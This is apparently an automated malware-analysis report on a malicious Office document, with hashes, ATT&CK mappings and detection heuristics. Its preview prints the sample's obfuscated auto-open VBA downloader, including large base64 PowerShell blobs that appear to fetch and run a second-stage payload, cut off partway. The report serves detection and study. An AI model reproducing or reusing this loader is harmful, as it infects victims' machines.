Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 607f4ba1739f9f47…

MALICIOUS

Office (OOXML)

15.6 KB First seen: 2021-09-17
MD5: 9a59dd1bc60d74e8e1eb9bf48567c404 SHA-1: 7ffe6a902640aaf59040a1fc53eee7db96e12290 SHA-256: 607f4ba1739f9f47422f6bf9f7baf8e6faafa2e03eb158767d8372ec3382de10
322 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32 T1071.001 Web Protocols: Web Protocols T1105 Ingress Tool Transfer

The sample contains obfuscated VBA macros with an Auto_open subroutine designed to execute malicious code. It heavily utilizes WScript.Shell and CreateObject to run commands, indicating an intent to download and execute a second-stage payload. The obfuscation and use of shell execution point towards a downloader or dropper functionality.

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5619 bytes
SHA-256: c80b0931e9570736f5396ea6db493fb0c93de8f03082082d0166c2fe941daba1
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "egler"

Public Sub Auto_open()
fr.xv
fddgd = sdfs

End Sub

Attribute VB_Name = "fr"
Sub xv()
iary = nbmnjk(223) & nbmnjk(201) & nbmnjk(192) & nbmnjk(156) & nbmnjk(171) & nbmnjk(191) & nbmnjk(156) & nbmnjk(204) & nbmnjk(203) & nbmnjk(218) & nbmnjk(243) & nbmnjk(218) & nbmnjk(225) & nbmnjk(206) & nbmnjk(239) & nbmnjk(218) & nbmnjk(228) & nbmnjk(225) & nbmnjk(218) & nbmnjk(232) & nbmnjk(232) & nbmnjk(156) & nbmnjk(169) & nbmnjk(193) & nbmnjk(156)
iary = iary & "WwBzAHkAUwBUAEUAbQAuAFQAZQBYAHQALgBFAE4AQwBPAEQASQBOAEcAXQA6ADoAVQBOAGkAQwBvAEQARQAuAGcARQB0AFMAdABSAEkATgBHACgAWwBzAHkAUwB0AGUATQAuAGMATwBOAHYARQBSAHQAXQA6ADoAZgBSAE8AbQBiAGEAcwBlADYANABzAHQAcgBJAG4AZwAoACIAZABBAEIAeQBBAEgAawBBAEkAQQBCADcAQQBHAFkAQQBiAHcAQgB5AEEAQwBBAEEASwBBAEEAawBBAEcAawBBAFAAUQBBAHgAQQBEAHMAQQBJAEEAQQBrAEEARwBrAEEASQBBAEEAdABBAEcAdwBBAFoAUQBBAGcAQQBEAEUAQQBNAGcAQQB3AEEARABBAEEATQBBAEEANwBBAEMAQQBBAEoAQQBCAHAAQQBDAHMAQQBLAHcAQQBwAEEAQwBBAEEAZQB3AEEAawBBAEcAawBBAEwAQQBBAGkAQQBHAEEAQQBiAGcAQQBpAEEASAAwAEEAZgBRAEEAZwBBAEcATQBBAFkAUQBCADAAQQBHAE0AQQBhAEEAQgA3AEEASAAwAEEARABRAEEASwBBAEcA"
iary = iary & "WQBBAGQAUQBCAHUAQQBHAE0AQQBkAEEAQgBwAEEARwA4AEEAYgBnAEEAZwBBAEgASQBBAFkAdwBCAGwAQQBHAE0AQQBjAHcAQgB0AEEARwBNAEEAYwB3AEIAbgBBAEgAbwBBAEkAQQBBAG8AQQBDAEEAQQBKAEEAQgBtAEEASABvAEEAYQBRAEIAdwBBAEcAZwBBAGQAQQBCAHYAQQBHADAAQQBlAGcAQgB1AEEARwB3AEEAZQBRAEIAawBBAEcAYwBBAFoAUQBBAGcAQQBDAHcAQQBJAEEAQQBrAEEASABNAEEAWgBRAEIAeABBAEcAUQBBAGQAZwBCADQAQQBIAGcAQQBaAFEAQgBrAEEARwBzAEEAWQBRAEIAcgBBAEcAbwBBAGMAQQBCAHEAQQBHAG8AQQBkAGcAQgBtAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBBAGcAQQBHAGsAQQBUAFEAQgBRAEEARwA4AEEAYwBnAEIAVQBBAEMAMABBAFQAUQBCAHYAQQBFAFEAQQBWAFEAQgBNAEEARwBVAEEASQBBAEIAQwBBAEUAawBBAGQAQQBCAFQAQQBIAFEAQQBVAGcA"
iary = iary & "QgBoAEEARQA0AEEAYwB3AEIARwBBAEcAVQBBAGMAZwBBADcAQQBBADAAQQBDAGcAQgBUAEEASABRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAEMAQQBFAGsAQQBWAEEAQgB6AEEARgBRAEEAYwBnAEIAQgBBAEcANABBAGMAdwBCAG0AQQBFAFUAQQBVAGcAQQBnAEEAQwAwAEEAVQB3AEIAUABBAEYAVQBBAFUAZwBCAGoAQQBFAFUAQQBJAEEAQQBrAEEARwBZAEEAZQBnAEIAcABBAEgAQQBBAGEAQQBCADAAQQBHADgAQQBiAFEAQgA2AEEARwA0AEEAYgBBAEIANQBBAEcAUQBBAFoAdwBCAGwAQQBDAEEAQQBMAFEAQgBFAEEARwBVAEEAVQB3AEIAMABBAEcAawBBAFQAZwBCAGgAQQBIAFEAQQBTAFEAQgBQAEEARwA0AEEASQBBAEEAawBBAEgATQBBAFoAUQBCAHgAQQBHAFEAQQBkAGcAQgA0AEEASABnAEEAWgBRAEIAawBBAEcAcwBBAFkAUQBCAHIAQQBHAG8AQQBjAEEAQgBxAEEARwBvAEEAZABnAEIAbQBBAEQA"
iary = iary & "cwBBAEkAQQBBAG0AQQBDAEEAQQBKAEEAQgB6AEEARwBVAEEAYwBRAEIAawBBAEgAWQBBAGUAQQBCADQAQQBHAFUAQQBaAEEAQgByAEEARwBFAEEAYQB3AEIAcQBBAEgAQQBBAGEAZwBCAHEAQQBIAFkAQQBaAGcAQQA3AEEAQwBBAEEAZgBRAEIAMABBAEgASQBBAGUAUQBCADcAQQBDAFEAQQBjAFEAQgBzAEEARwBjAEEAZQBnAEIAcwBBAEcAYwBBAFoAZwBCAHQAQQBIAGsAQQBiAGcAQgAwAEEARwBVAEEAZAB3AEIAagBBAEgAWQBBAFoAQQBBADkAQQBDAFEAQQBSAFEAQgBPAEEASABZAEEATwBnAEIAVQBBAEcAVQBBAGIAUQBCAFEAQQBDAHMAQQBKAHcAQgBjAEEASABNAEEAWgBRAEIAbABBAEgAQQBBAGQAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEATwB3AEEATgBBAEEAbwBBAGMAZwBCAGoAQQBHAFUAQQBZAHcAQgB6AEEARwAwAEEAWQB3AEIAegBBAEcAYwBBAGUAZwBBAGcAQQBDAGMAQQBhAEEA"
iary = iary & "QgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAE0AQQBiAHcAQgBwAEEASABRAEEAWQBRAEIAaABBAEcASQBBAEwAZwBCAGoAQQBHADgAQQBMAHcAQgBFAEEASABRAEEAYwB3AEIAcABBAEcAZwBBAGUAZwBCAG4AQQBIAGcAQQBZAHcAQgBsAEEARwBRAEEAYgBRAEIANgBBAEcAUQBBAFoAUQBCADUAQQBHAHcAQQBjAEEAQgB2AEEASABRAEEAYwBBAEIAbgBBAEcASQBBAGIAQQBCAHUAQQBIAE0AQQBlAEEAQgB6AEEASABrAEEAYgBRAEIAdgBBAEcARQBBAGMAZwBCADEAQQBDADQAQQBaAFEAQgA0AEEARwBVAEEASgB3AEEAZwBBAEMAUQBBAGMAUQBCAHMAQQBHAGMAQQBlAGcAQgBzAEEARwBjAEEAWgBnAEIAdABBAEgAawBBAGIAZwBCADAAQQBHAFUAQQBkAHcAQgBqAEEASABZAEEAWgBBAEEANwBBAEEAMABBAEMAZwBCAHkAQQBHAE0AQQBaAFEAQgBqAEEASABNAEEAYgBRAEIAagBBAEgA"
iary = iary & "TQBBAFoAdwBCADYAQQBDAEEAQQBKAHcAQgBvAEEASABRAEEAZABBAEIAdwBBAEgATQBBAE8AZwBBAHYAQQBDADgAQQBjAHcAQgB2AEEARwBrAEEAZABBAEIAaABBAEcARQBBAFkAZwBBAHUAQQBHAE0AQQBiAHcAQQB2AEEARQBRAEEAZABBAEIAegBBAEcAawBBAGEAQQBCADYAQQBHAGMAQQBlAEEAQgBqAEEARwBVAEEAWgBBAEIAdABBAEgAbwBBAFoAQQBCAGwAQQBIAGsAQQBiAEEAQgB3AEEARwA4AEEAZABBAEIAdwBBAEcAYwBBAFkAZwBCAHMAQQBHADQAQQBjAHcAQgA0AEEASABNAEEAZQBRAEIAdABBAEcAOABBAFkAUQBCAHkAQQBIAFUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAHgAQQBHAHc
... (truncated)
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 38400 bytes
SHA-256: b18021571353f2c75de54c87db609958e612cc89c4f8936a23873b81ebcdcf07
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 7 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.